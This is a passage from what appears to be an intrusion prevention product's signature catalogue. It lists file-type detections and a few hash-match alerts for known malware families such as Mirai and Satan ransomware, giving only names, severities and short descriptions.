Description: Microsoft PowerPoint 95 is a presentation application. It is a part of the Office 95 suite and is developed by Microsoft. MIME type: application/msoffice-ppt
Back to top

File_Microsoft-PowerPoint-97-Add-In

About this situation: Microsoft PowerPoint add-in detected
Context: File Type
Severity: 1
Tags: Microsoft PowerPoint Presentation, Internal File Type Tag, File Filtering
First detected in: sgpkg-ips-704-5211
Last changed: sgpkg-ips-704-5211
Description: Microsoft PowerPoint 97 add-ins are small applications for PowerPoint that extend or automate the use of the application. MIME type: application/msoffice-ppt
Back to top

File_Microsoft-PowerPoint-97-Presentation

About this situation: Microsoft PowerPoint presentation detected
Context: File Type
Severity: 1
Tags: Microsoft PowerPoint Presentation, Internal File Type Tag, File Filtering
First detected in: sgpkg-ips-704-5211
Last changed: sgpkg-ips-704-5211
Description: Microsoft PowerPoint 97 is a presentation application developed by Microsoft. It uses its own variant of an OLE-based file format. MIME type: application/msoffice-ppt
Back to top

File_Microsoft-PowerPoint-OLE-Slide

About this situation: Microsoft Visio drawing detected
Context: File Type
Severity: 1
Tags: Microsoft PowerPoint Presentation, Internal File Type Tag, File Filtering
First detected in: sgpkg-ips-704-5211
Last changed: sgpkg-ips-704-5211
Description: Microsoft PowerPoint is a presentation application. It is able to store a single slide to a special file. MIME type: application/msoffice-ppt
Back to top

File_Microsoft-PowerPoint-PPT-Filename-Extension

About this situation: Potentially a PowerPoint document file detected
Context: File Type
Severity: 1
Tags: Microsoft PowerPoint Presentation, Internal File Type Tag, File Filtering
First detected in: sgpkg-ips-704-5211
Last changed: sgpkg-ips-704-5211
Description: Potentially a PowerPoint document file was detected. This detection is based on the filename, and filename alone. MIME type: application/msoffice-ppt
Back to top

File_Microsoft-Silverlight-Application-Manifest

About this situation: Silverlight application manifest file detected
Context: File Type
Severity: 1
Tags: Microsoft Silverlight Application Manifest, Internal File Type Tag, File Filtering
First detected in: sgpkg-ips-768-5211
Last changed: sgpkg-ips-768-5211
Description: Silverlight is a application development framework developed by Microsoft. It has been available as a browser plugin, and it is also one of the primary development platforms for Windows Phone. Manifest file describes the application package contents.
Back to top

File_Microsoft-Silverlight-Application-Package

About this situation: Silverlight application package file detected
Context: File Type
Severity: 1
Tags: Microsoft Silverlight Application Package, Internal File Type Tag, File Filtering
First detected in: sgpkg-ips-767-5211
Last changed: sgpkg-ips-767-5211
Description: Silverlight is a application development framework developed by Microsoft. It has been available as a browser plugin, and it is also one of the primary development platforms for Windows Phone. MIME type: application/zip
Back to top

File_Microsoft-Universal-Windows-App-Package

About this situation: Silverlight application package file detected
Context: File Type
Severity: 1
Tags: Microsoft Universal Windows App Package, Internal File Type Tag, File Filtering
First detected in: sgpkg-ips-767-5211
Last changed: sgpkg-ips-767-5211
Description: Microsoft Universal Windows Platform (UWP) is the application deveplopment framework for different variants of Windows operating system - desktop, mobile and console. MIME type: application/zip
Back to top

File_Microsoft-UWP-Application-Tile

About this situation: Microsoft UWP Application Tile file detected
Context: File Type
Severity: 1
Tags: Microsoft UWP Application Tile, Internal File Type Tag, File Filtering
First detected in: sgpkg-ips-765-5211
Last changed: sgpkg-ips-765-5211
Description: Universal Windows Platform (UWP) is application platform and runtime for Microsoft Windows operating system. Application Tiles are elements used in the user interface to represent the application.
Back to top

File_Microsoft-Visio-Drawing

About this situation: Microsoft Visio drawing detected
Context: File Type
Severity: 1
Tags: Microsoft Visio Drawing, Internal File Type Tag, File Filtering
First detected in: sgpkg-ips-704-5211
Last changed: sgpkg-ips-704-5211
Description: Microsoft Visio is a diagramming and vector graphics drawing application. It uses its own OLE-based binary file format. MIME type: application/msoffice-doc
Back to top

File_Microsoft-Windows-Compiled-Help

About this situation: Microsoft Windows compiled help file detected
Context: File Type
Severity: 1
Tags: Microsoft Windows Compiled Help, Internal File Type Tag, File Filtering
First detected in: sgpkg-ips-703-5211
Last changed: sgpkg-ips-1730-5242
Description: Microsoft Windows Compiled HTML Help is propietary compressed file format used by Microsoft starting with Windows 98.
Back to top

File_Microsoft-Windows-CVE-2017-0005-POC-MD5

About this situation: Microsoft Windows Elevation of Privilege vulnerability POC MD5 match
Context: File MD5 hash
Severity: 10
Tags: Compromise
First detected in: sgpkg-ips-931-5242
Last changed: sgpkg-ips-931-5242
Description: A file that has a MD5 checksum matching to a POC file related to Microsoft Windows privilege elevation vulnerability CVE-2017-0005 was detected.
Back to top

File_Microsoft-Windows-Executable

About this situation: Microsoft Windows executable file detected
Context: File Type
Severity: 1
Tags: Microsoft Windows Executable, Internal File Type Tag, File Filtering
First detected in: sgpkg-ips-703-5211
Last changed: sgpkg-ips-1531-5242
Description: Microsoft Windows Portable Executable (PE) file detected. This is the executable file format used by the current versions of Microsoft Windows. MIME type: application/x-pe
Back to top

File_Microsoft-Windows-Fax-Cover-Sheet

About this situation: Microsoft Windows fax cover sheet document detected
Context: File Type
Severity: 1
Tags: Microsoft Windows Fax Cover Sheet, Internal File Type Tag, File Filtering
First detected in: sgpkg-ips-703-5211
Last changed: sgpkg-ips-1531-5242
Description: Microsoft Windows Fax utility was included in Windows prior Windows Vista. It uses its own binary file format to store cover sheet documents.
Back to top

File_Microsoft-Windows-Help-Document

About this situation: Microsoft Windows help document detected
Context: File Type
Severity: 1
Tags: Microsoft Windows Help Document, Internal File Type Tag, File Filtering
First detected in: sgpkg-ips-703-5211
Last changed: sgpkg-ips-1531-5242
Description: Microsoft Windows Help facility was included in Windows versions prior to Windows 98. It uses its own, proprietary file format.
Back to top

File_Microsoft-Windows-Media-HTTP-Stream

About this situation: Microsoft Windows Media HTTP stream detected
Context: File Type
Severity: 1
Tags: Microsoft Windows Media HTTP Stream, Internal File Type Tag, File Filtering
First detected in: sgpkg-ips-703-5211
Last changed: sgpkg-ips-1531-5242
Description: Microsoft Windows Media HTTP Stream Protocol is a client/server protocol used to stream real-time data between the client and the server.
Back to top

File_Microsoft-Windows-Memory-Dump

About this situation: Microsoft Windows memory dump file detected
Context: File Type
Severity: 1
Tags: Microsoft Windows Memory Dump, Internal File Type Tag, File Filtering
First detected in: sgpkg-ips-703-5211
Last changed: sgpkg-ips-1531-5242
Description: Microsoft Windows memory dump contains the entire memory contents from a system crash, known as bugcheck or a blue screen of death. This memory dump can be used to debug and aid determining the cause of the crash.
Back to top

File_Microsoft-Windows-Metafile

About this situation: Microsoft Windows metafile detected
Context: File Type
Severity: 1
Tags: Microsoft Windows Metafile, Internal File Type Tag, File Filtering
First detected in: sgpkg-ips-703-5211
Last changed: sgpkg-ips-1531-5242
Description: Windows Metafile is a image format originally developed by Microsoft for Windows 3.0. It utilitizes its own binary file format.
Back to top

File_Microsoft-Windows-Shortcut

About this situation: Microsoft Windows shortcut file detected
Context: File Type
Severity: 1
Tags: Microsoft Windows Shortcut, Internal File Type Tag, File Filtering
First detected in: sgpkg-ips-703-5211
Last changed: sgpkg-ips-1531-5242
Description: Microsoft Windows shortcut (LNK) file is a reference to another file. Windows shortcut can contain various parameters how the linked file will be opened or executed, beside the actual location of the referenced file.
Back to top

File_Microsoft-Word-2003-XML-Document

About this situation: Microsoft Word legacy document detected
Context: File Type
Severity: 1
Tags: Microsoft Word 2003 XML Document, Internal File Type Tag, File Filtering
First detected in: sgpkg-ips-758-5211
Last changed: sgpkg-ips-758-5211
Description: Microsoft Word 2003 introduced a new, XML-based document file format. It was superseded by the Open Office XML format in Microsoft Office 2007. MIME type: application/msoffice-doc
Back to top

File_Microsoft-Word-6-Document

About this situation: Microsoft Word 6 document detected
Context: File Type
Severity: 1
Tags: Microsoft Word Document, Internal File Type Tag, File Filtering
First detected in: sgpkg-ips-704-5211
Last changed: sgpkg-ips-704-5211
Description: Microsoft Word version 6 was released 1993. It was the first version that used the Object Linking and Embedding (OLE) file format. MIME type: application/msoffice-doc
Back to top

File_Microsoft-Word-97-Document

About this situation: Microsoft Word 97 document detected
Context: File Type
Severity: 1
Tags: Microsoft Word Document, Internal File Type Tag, File Filtering
First detected in: sgpkg-ips-704-5211
Last changed: sgpkg-ips-704-5211
Description: Microsoft Word 97, also known as version 8.0, was released 1997. It had its own variant of the binary file format. MIME type: application/msoffice-doc
Back to top

File_Microsoft-Word-DOC-Filename-Extension

About this situation: Potentially a Word document file detected
Context: File Type
Severity: 1
Tags: Microsoft Word Document, Internal File Type Tag, File Filtering
First detected in: sgpkg-ips-704-5211
Last changed: sgpkg-ips-704-5211
Description: Potentially a Word document file was detected. This detection is based on the filename, and filename alone. MIME type: application/msoffice-doc
Back to top

File_Microsoft-Word-For-Macintosh-Version-5-Document

About this situation: Microsoft Word for Macintosh version 5 legacy document detected
Context: File Type
Severity: 1
Tags: Microsoft Word For Macintosh Version 5 Document, Internal File Type Tag, File Filtering
First detected in: sgpkg-ips-703-5211
Last changed: sgpkg-ips-1531-5242
Description: Microsoft Word for Macintosh version 5 was released in 1993. It uses its own, now legacy, document file format. MIME type: application/msoffice-doc
Back to top

File_Microsoft-Word-Legacy-Document

About this situation: Microsoft Word legacy document detected
Context: File Type
Severity: 1
Tags: Microsoft Word Legacy Document, Internal File Type Tag, File Filtering
First detected in: sgpkg-ips-703-5211
Last changed: sgpkg-ips-1531-5242
Description: Microsoft Word prior version 6.0 used a completely different binary document file format. This document format is no longer supported and is consired legacy. MIME type: application/msoffice-doc
Back to top

File_Microsoft-XVD-Package

About this situation: Microsoft XVD disk image detected
Context: File Type
Severity: 1
Tags: Microsoft XVD Package, Internal File Type Tag, File Filtering
First detected in: sgpkg-ips-747-5211
Last changed: sgpkg-ips-747-5211
Description: XVD or XBox Virtual Disk is a file format used to distribute content, such as games and operating system updates, for Xbox One gaming console developed by Microsoft.
Back to top

File_Microsoft-XZP-Package

About this situation: Microsoft XZP disk image detected
Context: File Type
Severity: 1
Tags: Microsoft XZP Package, Internal File Type Tag, File Filtering
First detected in: sgpkg-ips-749-5211
Last changed: sgpkg-ips-749-5211
Description: XZP or XBox Package is a file format used to distribute content, such as games and operating system updates, for Xbox 360 gaming console developed by Microsoft.
Back to top

File_MIDI-Audio

About this situation: MIDI audio file detected
Context: File Type
Severity: 1
Tags: MIDI Audio, Internal File Type Tag, File Filtering
First detected in: sgpkg-ips-703-5211
Last changed: sgpkg-ips-1531-5242
Description: Musical Instrument Digital Interface (MIDI) audio file format saves music elements. It does not save actual audio, but provides information how audio can be recreated based on those elements.
Back to top

File_Mime-Message

About this situation: MIME message detected
Context: File Type
Severity: 1
Tags: Mime Message, Internal File Type Tag, File Filtering
First detected in: sgpkg-ips-756-5211
Last changed: sgpkg-ips-756-5211
Description: Multipurpose Internet Mail Extensions (MIME) is an Internet standard for messages that contain non-ASCII body and binary attachments. While typically used in email messages, MIME is sometimes used to deliver data over other transports as well.
Back to top

File_Mirai-Botnet-Binary-MD5

About this situation: Mirai Botnet binary MD5 match
Context: File MD5 hash
Severity: 8
Tags: Compromise
First detected in: sgpkg-ips-826-5242
Last changed: sgpkg-ips-826-5242
Description: A file has been blocked because it's MD5 checksum matches to a Mirai Botnet binary. The Mirai botnet infects IoT class network devices such as security cameras and home routers.
Back to top

File_MMTLS-Data

About this situation: MMTLS data file detected
Context: File Type
Severity: 1
Tags: MMTLS Data, Internal File Type Tag, File Filtering
First detected in: sgpkg-ips-1686-5242
Last changed: sgpkg-ips-1686-5242
Description: MMTLS is a proprietary protocol used by WeChat application. The MMTLS traffic may be sent in HTTP payload, which triggers this file type identification.
Back to top

File_Mozilla-Archive

About this situation: Mozilla archive file detected
Context: File Type
Severity: 1
Tags: Mozilla Archive, Internal File Type Tag, File Filtering
First detected in: sgpkg-ips-755-5211
Last changed: sgpkg-ips-755-5211
Description: Mozilla Archive files is an internal archive format used by projects run by Mozilla, such as Firefox browser, to deliver updates.
Back to top

File_MP3-Audio

About this situation: MP3 audio file detected
Context: File Type
Severity: 1
Tags: MP3 Audio, Internal File Type Tag, File Filtering
First detected in: sgpkg-ips-703-5211
Last changed: sgpkg-ips-1531-5242
Description: MP3 is a popular lossy audio compression file and streaming format, standardized first in Moving Picture Experts Group (MPEG) as a part of MPEG-1 and later MPEG-2 standards.
Back to top

File_MP3-Lyrics

About this situation: MP3 lyrics file detected
Context: File Type
Severity: 1
Tags: MP3 Lyrics, Internal File Type Tag, File Filtering
First detected in: sgpkg-ips-703-5211
Last changed: sgpkg-ips-1531-5242
Description: MP3 Lyrics is a file format that is designed to contain metadata for a given MP3 audio stream, such as song lyrics.
Back to top

File_MPEG-Transport-Stream

About this situation: MPEG tranport stream detected
Context: File Type
Severity: 1
Tags: MPEG Transport Stream, Internal File Type Tag, File Filtering
First detected in: sgpkg-ips-713-5211
Last changed: sgpkg-ips-713-5211
Description: Detected a MPEG transport stream. MPEG transport stream is a container format for audio and video broadcasts.
Back to top

FILE_Nested-Archive-Limit-Reached

About this situation: Nested archive limit reached
Context: File decompression without parameters
Severity: 2
Tags: Other Suspicious Traffic
First detected in: sgpkg-ips-561-5211
Last changed: sgpkg-ips-561-5211
Description: The inspection module has determined that the number of nested archives has reached the limit. No further inspection is possible.
Back to top

File_New-Executable

About this situation: New Executable (NE) file detected
Context: File Type
Severity: 1
Tags: New Executable, Internal File Type Tag, File Filtering
First detected in: sgpkg-ips-703-5211
Last changed: sgpkg-ips-1531-5242
Description: An executable that contains New Executable (NE) file header was found. This is the executable file format used by older 16-bit version of OS/2 and Windows. MIME type: application/x-dosexec
Back to top

File_NTT-TwinVQ

About this situation: NTT TwinVQ file detected
Context: File Type
Severity: 1
Tags: NTT TwinVQ, Internal File Type Tag, File Filtering
First detected in: sgpkg-ips-703-5211
Last changed: sgpkg-ips-1531-5242
Description: TwinVQ is a legacy audio compression tool and method developed by Nippon Telegraph and Telephone Corporation (NTT).
Back to top

File_OCSP-Request

About this situation: OCSP Request detected
Context: File Type
Severity: 1
Tags: OCSP Request, Internal File Type Tag, File Filtering
First detected in: sgpkg-ips-766-5211
Last changed: sgpkg-ips-766-5211
Description: The Online Certificate Status Protocol (OCSP) is a protocol to determine whether a certificate has been revocated.
Back to top

File_Office-Open-XML-Application-Properties-Part

About this situation: Office Open XML application properties part file detected
Context: File Type
Severity: 1
Tags: Microsoft Office Open XML Document, Internal File Type Tag, File Filtering
First detected in: sgpkg-ips-758-5211
Last changed: sgpkg-ips-758-5211
Description: Detected an XML component of an Office Open XML document. MIME type: application/msoffice-docx
Back to top

File_Office-Open-XML-Content-Type-Item

About this situation: Office Open XML content type item file detected
Context: File Type
Severity: 1
Tags: Microsoft Office Open XML Document, Internal File Type Tag, File Filtering
First detected in: sgpkg-ips-758-5211
Last changed: sgpkg-ips-758-5211
Description: Detected an XML component of an Office Open XML document. MIME type: application/msoffice-docx
Back to top

File_Office-Open-XML-Core-Properties-Part

About this situation: Office Open XML core properties part file detected
Context: File Type
Severity: 1
Tags: Microsoft Office Open XML Document, Internal File Type Tag, File Filtering
First detected in: sgpkg-ips-758-5211
Last changed: sgpkg-ips-758-5211
Description: Detected an XML component of an Office Open XML document. MIME type: application/msoffice-docx
Back to top

File_Office-Open-XML-Custom-Properties-Part

About this situation: Office Open XML custom properties part file detected
Context: File Type
Severity: 1
Tags: Microsoft Office Open XML Document, Internal File Type Tag, File Filtering
First detected in: sgpkg-ips-758-5211
Last changed: sgpkg-ips-758-5211
Description: Detected an XML component of an Office Open XML document. MIME type: application/msoffice-docx
Back to top

File_Office-Open-XML-Package-Relations-Item

About this situation: Office Open XML package relations item file detected
Context: File Type
Severity: 1
Tags: Microsoft Office Open XML Document, Internal File Type Tag, File Filtering
First detected in: sgpkg-ips-758-5211
Last changed: sgpkg-ips-758-5211
Description: Detected an XML component of an Office Open XML document. MIME type: application/msoffice-docx
Back to top

File_Office-Open-XML-Styles-Part

About this situation: Office Open XML styles part file detected
Context: File Type
Severity: 1
Tags: Microsoft Office Open XML Document, Internal File Type Tag, File Filtering
First detected in: sgpkg-ips-758-5211
Last changed: sgpkg-ips-758-5211
Description: Detected an XML component of an Office Open XML document. MIME type: application/msoffice-docx
Back to top

File_Office-Open-XML-Workbook-Part

About this situation: Office Open XML workbook part file detected
Context: File Type
Severity: 1
Tags: Microsoft Office Open XML Document, Internal File Type Tag, File Filtering
First detected in: sgpkg-ips-758-5211
Last changed: sgpkg-ips-758-5211
Description: Detected an XML component of an Office Open XML document. MIME type: application/msoffice-docx
Back to top

File_Ogg

About this situation: Ogg media container file detected
Context: File Type
Severity: 1
Tags: Ogg, Internal File Type Tag, File Filtering
First detected in: sgpkg-ips-745-5211
Last changed: sgpkg-ips-745-5211
Description: Ogg is a free and open media container file format. It can contain combination of audio, video and other related metadata.
Back to top

File_OneNote-Document

About this situation: OneNote document detected
Context: File Type
Severity: 1
Tags: OneNote Document, Internal File Type Tag, File Filtering
First detected in: sgpkg-ips-703-5211
Last changed: sgpkg-ips-1730-5242
Description: Microsoft OneNote is a collaboration utility developed by Microsoft. It is a part of the Office suite, and it uses its own proprietary file format.
Back to top

File_Open-Software-Description

About this situation: Open Software Descrioption file detected
Context: File Type
Severity: 1
Tags: Open Software Description, Internal File Type Tag, File Filtering
First detected in: sgpkg-ips-741-5211
Last changed: sgpkg-ips-741-5211
Description: Open Software Description files are used to describe software installation packages, versions and dependecies, to help software delivery.
Back to top

File_OpenType-Filename-Extension

About this situation: A file with OTF filename extension detected
Context: File Type
Severity: 1
Tags: OpenType Font, Internal File Type Tag, File Filtering
First detected in: sgpkg-ips-756-5211
Last changed: sgpkg-ips-756-5211
Description: A file with an filename extension "otf" was detected. This may indicate that file contains an OpenType font file, however, if the file content is not available this cannot be validated. This detection is based on the filename, and filename alone.
Back to top

File_OpenType-Font

About this situation: OpenType font file detected
Context: File Type
Severity: 1
Tags: OpenType Font, Internal File Type Tag, File Filtering
First detected in: sgpkg-ips-713-5211
Last changed: sgpkg-ips-713-5211
Description: Detected an OpenType font file. OpenType font is standardized specification as ISO Standard ISO/IEC 14496-22 (MPEG-4 Part 22), also known as Open Font Format (OFF).
Back to top

File_Oracle-VirtualBox-Disk-Image

About this situation: VirtualBox disk image file detected
Context: File Type
Severity: 1
Tags: Oracle VirtualBox Disk Image, Internal File Type Tag, File Filtering
First detected in: sgpkg-ips-703-5211
Last changed: sgpkg-ips-1531-5242
Description: VirtualBox is a hypervisor developed by Oracle. VirtualBox disk image files contain the contents of the entire virtual hard drive for a given guest system.
Back to top

File_PDF

About this situation: PDF File detected
Context: File Type
Severity: 1
Tags: Generic PDF Document, Internal File Type Tag, File Filtering
First detected in: sgpkg-ips-703-5211
Last changed: sgpkg-ips-1531-5242
Description: PDF File detected. MIME type: application/pdf
Back to top

File_PDF-Filename-Extension

About this situation: Potentially PDF document file detected
Context: File Type
Severity: 1
Tags: Generic PDF Document, Internal File Type Tag, File Filtering
First detected in: sgpkg-ips-704-5211
Last changed: sgpkg-ips-704-5211
Description: Potentially a PDF document file was detected. This detection is based on the filename, and filename alone. MIME type: application/pdf
Back to top

File_Perl-Interpreted-Script

About this situation: A Perl interpreted script file detected
Context: File Type
Severity: 1
Tags: Interpreted Script, Internal File Type Tag, File Filtering
First detected in: sgpkg-ips-1496-5242
Last changed: sgpkg-ips-1496-5242
Description: Perl is an interpreted general-purpose scripting language. This identification is made based on the script file starting with a reference to the Perl interpreter. MIME type: text/x-perl
Back to top

File_PGP-Message

About this situation: PGP message detected
Context: File Type
Severity: 1
Tags: PGP Message, Internal File Type Tag, File Filtering
First detected in: sgpkg-ips-750-5211
Last changed: sgpkg-ips-750-5211
Description: Pretty Good Privacy (PGP) is a popular data encryption program. It provides cryptographic privacy and authentication, and is often used to sign and encrypt messages and other content.
Back to top

File_PGP-Signature

About this situation: PGP signature detected
Context: File Type
Severity: 1
Tags: PGP Signature, Internal File Type Tag, File Filtering
First detected in: sgpkg-ips-839-5242
Last changed: sgpkg-ips-839-5242
Description: Pretty Good Privacy (PGP) is a popular data encryption program. It provides cryptographic privacy and authentication, and is often used to sign and encrypt messages and other content.
Back to top

File_PKI-Certificate

About this situation: PKI Certificate file detected
Context: File Type
Severity: 1
Tags: PKI Certificate, Internal File Type Tag, File Filtering
First detected in: sgpkg-ips-737-5211
Last changed: sgpkg-ips-737-5211
Description: Public key certificate is prove of an indetity, certified by a certain Certificate Authority (CA). Certificates are part of the Internet X.509 Public Key Infrastructure (PKI).
Back to top

File_PKI-Certificate-Filename

About this situation: PKI Certificate file detected
Context: File Type
Severity: 1
Tags: PKI Certificate, Internal File Type Tag, File Filtering
First detected in: sgpkg-ips-753-5211
Last changed: sgpkg-ips-753-5211
Description: A file that has extension "cer" or "crt" was detected. This may indicate a PKI certificate file, but the detection was based on the filename alone - the content was not verified.
Back to top

File_PKI-Certificate-Revocation-List

About this situation: PKI Certificate Revocation List file detected
Context: File Type
Severity: 1
Tags: PKI Certificate Revocation List, Internal File Type Tag, File Filtering
First detected in: sgpkg-ips-737-5211
Last changed: sgpkg-ips-737-5211
Description: Certificate Revocation List (CRL) is a list of certificates that a certain Certificate Authority (CA) has revoked. CRLs are part of the Internet X.509 Public Key Infrastructure.
Back to top

File_PKI-Certificate-Revocation-List-Filename

About this situation: PKI Certificate Revocation List file detected
Context: File Type
Severity: 1
Tags: PKI Certificate Revocation List, Internal File Type Tag, File Filtering
First detected in: sgpkg-ips-753-5211
Last changed: sgpkg-ips-753-5211
Description: A file that has extension "crl" was detected. This may indicate a PKI certificate revocation list file, but the detection was based on the filename alone - the content was not verified.
Back to top

File_PNG-Filename-Extension

About this situation: Potentially a PNG file detected
Context: File Type
Severity: 1
Tags: PNG Image, Internal File Type Tag, File Filtering
First detected in: sgpkg-ips-704-5211
Last changed: sgpkg-ips-704-5211
Description: Potentially a PNG file was detected. This detection is based on the filename, and filename alone.
Back to top

File_PNG-Image

About this situation: Portable Network Graphics (PNG) image file detected
Context: File Type
Severity: 1
Tags: PNG Image, Internal File Type Tag, File Filtering
First detected in: sgpkg-ips-703-5211
Last changed: sgpkg-ips-1531-5242
Description: Portable Network Graphics (PNG) is a raster graphics file format that was designed to replace Graphics Interchange Format (GIF). It supports lossless compression and it is widely used.
Back to top

File_Proxy-Autoconfig

About this situation: Proxy Autoconfig file detected
Context: File Type
Severity: 1
Tags: Proxy Autoconfig, Internal File Type Tag, File Filtering
First detected in: sgpkg-ips-774-5211
Last changed: sgpkg-ips-774-5211
Description: Proxy Auto-config (PAC) file contains a configuration for web browsers and other user agents that choose the appropriate proxy service when fetching a particular resource. This is expressed in a form of a single JavaScript function.
Back to top

File_Psiphon-Binary-MD5

About this situation: Psiphon Binary MD5 match
Context: File MD5 hash
Severity: 8
Tags: Tunneling Protocols
First detected in: sgpkg-ips-854-5242
Last changed: sgpkg-ips-854-5242
Description: Psiphon Binary file transfer was detected. Psiphon is a network traffic anonymization tool.
Back to top

File_Python-Interpreted-Script

About this situation: A Python interpreted script file detected
Context: File Type
Severity: 1
Tags: Interpreted Script, Internal File Type Tag, File Filtering
First detected in: sgpkg-ips-1496-5242
Last changed: sgpkg-ips-1496-5242
Description: Python is an interpreted general-purpose scripting language. This identification is made based on the script file starting with a reference to the Python interpreter. MIME type: text/x-python
Back to top

File_Quant-Loader-Trojan-Binary-SHA1

About this situation: Quant Loader Trojan binary SHA1 match
Context: File SHA1 hash
Severity: 8
Tags: Compromise
First detected in: sgpkg-ips-1020-5242
Last changed: sgpkg-ips-1020-5242
Description: A file that has a SHA1 checksum matching to Quant Loader Trojan binary has been detected. Quant Loader is a trojan downloader.
Back to top

File_Range-Seen

About this situation: File range seen
Context: File Filtering
Severity: 1
Tags: File Filtering
First detected in: sgpkg-ips-704-5211
Last changed: sgpkg-ips-704-5211
Description: The file transfer contains one or more partial ranges of the file.
Back to top

File_Rar-Archive

About this situation: Rar archive file detected
Context: File Type
Severity: 1
Tags: Rar Archive, Internal File Type Tag, File Filtering
First detected in: sgpkg-ips-703-5211
Last changed: sgpkg-ips-1531-5242
Description: RAR is a general purpose file archiving format developed by Eugene Roshal in 1993. It is used by popular archiving program WinRAR. MIME type: application/x-rar
Back to top

File_Raw-Disk-Image

About this situation: Raw disk image file detected
Context: File Type
Severity: 1
Tags: Raw Disk Image, Internal File Type Tag, File Filtering
First detected in: sgpkg-ips-703-5211
Last changed: sgpkg-ips-1531-5242
Description: Raw disk image is taken directly from a disk partition or from a whole disk. Disk images are used for archiving, forensics and virtual machines.
Back to top

File_RealMedia-Video

About this situation: RealMedia video file detected
Context: File Type
Severity: 1
Tags: RealMedia Video, Internal File Type Tag, File Filtering
First detected in: sgpkg-ips-703-5211
Last changed: sgpkg-ips-1531-5242
Description: RealMedia is a proprietary multimedia container format developed by RealNetworks. It is designed especially for streaming media.
Back to top

File_RealNetworks-Internet-Video

About this situation: RealNetworks Internet video file detected
Context: File Type
Severity: 1
Tags: RealNetworks Internet Video, Internal File Type Tag, File Filtering
First detected in: sgpkg-ips-703-5211
Last changed: sgpkg-ips-1531-5242
Description: RealNetworks Internet Video File is a proprietary file format to store video streams, developed by RealNetworks.
Back to top

File_Red-Hat-Binary-Installation-Package

About this situation: Red Hat binary installation package file detected
Context: File Type
Severity: 1
Tags: Red Hat Binary Installation Package, Internal File Type Tag, File Filtering
First detected in: sgpkg-ips-703-5211
Last changed: sgpkg-ips-1531-5242
Description: Red Hat uses binary installaton packages to install and update software. The binary installation package contains executable files for the application software, as well as installation scripts.
Back to top

File_RGB-Filename-Extension

About this situation: A file with RGB filename extension detected
Context: File Type
Severity: 1
Tags: RGB Image, Internal File Type Tag, File Filtering
First detected in: sgpkg-ips-744-5211
Last changed: sgpkg-ips-744-5211
Description: A file with an filename extension "rgb" was detected. This may indicate that file contains a grahic image using raw RGB file format, however, if the file content is not available this cannot be validated. This detection is based on the filename, and filename alone.
Back to top

File_RGB-Image

About this situation: RGB image file detected
Context: File Type
Severity: 1
Tags: RGB Image, Internal File Type Tag, File Filtering
First detected in: sgpkg-ips-744-5211
Last changed: sgpkg-ips-744-5211
Description: A raw RGB image file contains the raw image data in a bitmap form. It does not implement compression or anything beyond the image data itself.
Back to top

File_Rich-Site-Summary

About this situation: Rich Site Summary file detected
Context: File Type
Severity: 1
Tags: Rich Site Summary, Internal File Type Tag, File Filtering
First detected in: sgpkg-ips-736-5211
Last changed: sgpkg-ips-736-5211
Description: Rich Site Summary (RSS), also known as Really Simple Syndication, is a web publication file format for frequently updated information, such as blog entries or news headlines.
Back to top

File_RIFF

About this situation: RIFF File detected
Context: File Type
Severity: 1
Tags: RIFF Container, Internal File Type Tag, File Filtering
First detected in: sgpkg-ips-703-5211
Last changed: sgpkg-ips-1531-5242
Description: The Resource Interchange File Format (RIFF) is a generic file container format for storing data, primarily multimedia such as sound and video.
Back to top

File_RigEK-Binary-MD5

About this situation: RigEK file MD5sum match
Context: File MD5 hash
Severity: 8
Tags: Compromise
First detected in: sgpkg-ips-869-5242
Last changed: sgpkg-ips-869-5242
Description: A file that has a MD5 checksum matching to a known RIG exploit kit binary has been detected.
Back to top

File_Robots-Exclusion

About this situation: Robots exclusion file detected
Context: File Type
Severity: 1
Tags: Robots Exclusion, Internal File Type Tag, File Filtering
First detected in: sgpkg-ips-703-5211
Last changed: sgpkg-ips-1531-5242
Description: Robots exclusion detected. Robots exclusion file ("robots.txt") is used to guide automatic web crawlers which parts of a particular web site can be crawled and which shouldn't.
Back to top

File_Robots-Exclusion-Filename

About this situation: Robots exclusion file detected
Context: File Type
Severity: 1
Tags: Robots Exclusion, Internal File Type Tag, File Filtering
First detected in: sgpkg-ips-774-5211
Last changed: sgpkg-ips-774-5211
Description: Robots exclusion detected by filename. Robots exclusion file ("robots.txt") is used to guide automatic web crawlers which parts of a particular web site can be crawled and which shouldn't.
Back to top

File_Romfs-Disk-Image

About this situation: Romfs disk image file detected
Context: File Type
Severity: 1
Tags: Romfs Disk Image, Internal File Type Tag, File Filtering
First detected in: sgpkg-ips-703-5211
Last changed: sgpkg-ips-1531-5242
Description: RomFS is a simplified filesystem, meant for the Linux firmware images and it is used on various Linux-based appliances.
Back to top

File_RTF

About this situation: RTF File detected
Context: File Type
Severity: 1
Tags: RTF Document, Internal File Type Tag, File Filtering
First detected in: sgpkg-ips-703-5211
Last changed: sgpkg-ips-1531-5242
Description: Rich Text Format (RTF) is a document file format developed by Microsoft for cross-platform document interchange. MIME type: text/rtf
Back to top

File_Ruby-Interpreted-Script

About this situation: A Ruby interpreted script file detected
Context: File Type
Severity: 1
Tags: Interpreted Script, Internal File Type Tag, File Filtering
First detected in: sgpkg-ips-1496-5242
Last changed: sgpkg-ips-1496-5242
Description: Ruby is an interpreted general-purpose scripting language. This identification is made based on the script file starting with a reference to the Ruby interpreter.
Back to top

File_SamSam1-Binary-SHA1

About this situation: SamSam1 binary SHA1 match
Context: File SHA1 hash
Severity: 8
Tags: Compromise
First detected in: sgpkg-ips-1119-5242
Last changed: sgpkg-ips-1119-5242
Description: A file that has a SHA1 checksum matching to a SamSam1 binary has been detected.
Back to top

File_Satan-Ransomware-Binary-MD5

About this situation: Satan ransomware binary MD5 match
Context: File MD5 hash
Severity: 8
Tags: Compromise
First detected in: sgpkg-ips-1062-5242
Last changed: sgpkg-ips-1062-5242
Description: A file that has a MD5 checksum associated to a file related to Satan ransomware was detected. Satan is a ransomware which spreads using the EternalBlue exploit. It uses the extension ".satan" for the encrypted files.
Back to top

File_Self-Extracting-Zip-Archive

About this situation: Self extracting zip archive detected
Context: File Type
Severity: 1
Tags: Self Extracting Zip Archive, Internal File Type Tag, File Filtering
First detected in: sgpkg-ips-703-5211
Last changed: sgpkg-ips-1531-5242
Description: Self extracting zip arcive detected. Self extracting zip archives are regular zip archives that contain an executable stub that can be used to extract the zip contents without an external program. MIME type: application/x-pe
Back to top

File_Snappy-Compressed

About this situation: Snappy compressed file detected
Context: File Type
Severity: 1
Tags: Snappy Compressed, Internal File Type Tag, File Filtering
First detected in: sgpkg-ips-760-5211
Last changed: sgpkg-ips-760-5211
